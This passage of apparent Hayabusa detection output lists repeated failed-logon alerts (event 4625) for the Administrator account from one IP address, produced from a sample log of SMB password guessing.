NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdcU6ypEEeIAugGI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jIMfGIU1pHasO88g : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHsxKEQK7CWSqprp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QkC70klP6mv8YZrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3YM3zaZk64qqq7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mOLbk23zOqQLZYZU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0tlyXqvCQJVqaB5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: npjQlHcGls5gENng : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7buinUqketmW3Ib6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rs5gYGs6JBf2yV1J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67hYMvtmbrmv5LHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtV42zBnWwRCLfJS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jnaPNm28FvbFfM8L : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCEvKO14gPFHAZIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iJJyXCm1YOI2uIAS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MNAScx4qMKxCJQdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKTHsNA29ZnPHCHQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CjvAb3sjN0PM8my4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wYQ6HuRSMh8DXzMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZgejUxgojDE1kR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2L4yO411OUnkRGWQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O3mGCNGFML75P7w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6CBslPz31UACz0wR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4Y8V0wB6unpmFXA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXSbx81GD6dYgHtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWbnppJfJ0Ll9oLW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoUjizV5iXImPGTe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHNG9oylnT46IObg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LUeAisNPQULjD2t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2sB5MlRw4Ox1OWdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WaklWtKd8QByH8M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nzvyy6CUk43SVxZW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xeolvnD92qP1dJPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDvRwPbu6yQH2pEf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxKdofXKKkCLn2n6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkO9p50Q9iFolbmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p01SZCA784xmPMe2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XKaI3FHBbBXvVsES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmUk6sW8QreDIZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0w9SSWaaTX7chM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 46vgsyX5Wxn2rupf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PV8628a8GNKoFyzM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mksBFEFzkC08dB4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U6QlHT6Bp63JDehd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRj4fxcRY0Esegl6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dj6zQjZwGEBo0zNt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imfY1T2VMoaqDSUd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvPP8UYn9fLpRYl4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFTGQ5tzNI5k58cK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8Zj3g1WiTLx8OlJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x2Lr6j8Qt4xEmZZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BeDRsguCovO47lKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KqrDyaFTewMPSzD9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nBVMAki1Ghpknf6p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXKhNUmBUQBTyeNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1g9TVwsweaBfZgE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kWymb6ucohaBB60b : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjL0zwlZofVuWhGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxsdzkJdnaZs5eKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PR6EpKvbqMeoQlKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZ3LMTtsVNI1gRO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75bNeXwYSZPhJdJ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lH6TVXSqJb1qLd3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edDWye6c2UhKznR6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxKUl1lynGY1ectn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vI5yUgukPBVRorJI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmR29QcBKMGVQ8rB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7luV5GfiT0v0h7D : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yA7pIDFgQbLIInqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 84g2gO0253Ut4O1O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DRkFX9WTAhBZ8jc8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuoQAi4k3XZPaf4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KjKMhCnbR0uFT0av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
